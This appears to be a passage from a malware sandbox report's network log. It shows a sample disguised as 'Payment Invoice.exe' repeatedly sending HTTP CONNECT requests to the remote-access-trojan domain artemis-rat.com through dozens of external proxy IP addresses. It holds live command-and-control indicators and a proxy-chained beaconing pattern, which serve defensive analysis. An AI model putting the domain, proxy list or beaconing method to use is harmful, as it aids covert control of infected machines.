                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714665890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714591026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.714468002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.511245966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1213192.168.2.451676198.57.229.185647677076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.911535978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089478016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1214192.168.2.453775172.64.207.185807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.913532019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.074615002 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1215192.168.2.45368867.43.227.22790537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.921318054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1216192.168.2.453606177.67.136.24141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.925349951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1217192.168.2.453089198.8.84.341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.927352905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1218192.168.2.453603148.66.130.5382687076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.984118938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1219192.168.2.45161180.78.64.7041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.984121084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1220192.168.2.45178120.80.103.19331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.989172935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089541912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183350086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.205563068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.276778936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:26.676991940 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1221192.168.2.452991146.19.106.217123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.989177942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1222192.168.2.453743129.213.150.205807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.989444017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1223192.168.2.45372772.10.160.9036017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.989878893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.043287992 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1224192.168.2.45372572.10.160.90100557076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.989900112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.760155916 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1225192.168.2.45373967.43.227.227324457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.992162943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1226192.168.2.45374568.183.143.134807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.992451906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.620579004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.324496031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.714842081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.527105093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214718103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.027084112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.511279106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.214216948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1227192.168.2.453631173.212.240.168466647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.992852926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.683228970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.756989002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777175903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.589529991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.480070114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386624098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.025836945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1228192.168.2.45359695.188.82.14736297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.993242979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1229192.168.2.45367361.79.73.225807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.994024992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1230192.168.2.45300787.237.239.5731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.994210958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089482069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183347940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.205564022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.276721001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.276731968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.277327061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.276748896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.401819944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.888710976 CET84INHTTP/1.0 200 Connection established
                                                                Proxy-agent: Kerio Control/9.1.0 build 1087


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1231192.168.2.453627157.185.173.217265897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.994213104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1232192.168.2.45362431.134.151.40807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.994214058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1233192.168.2.453621146.59.18.246158607076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.994354010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1234192.168.2.4536708.217.143.187156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.994472027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1235192.168.2.453794104.19.109.209807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.002945900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.157311916 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1236192.168.2.453793104.18.251.208807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.002947092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.157572985 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1237192.168.2.453750184.185.2.1241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.014676094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1238192.168.2.453766181.115.75.10256787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.016531944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


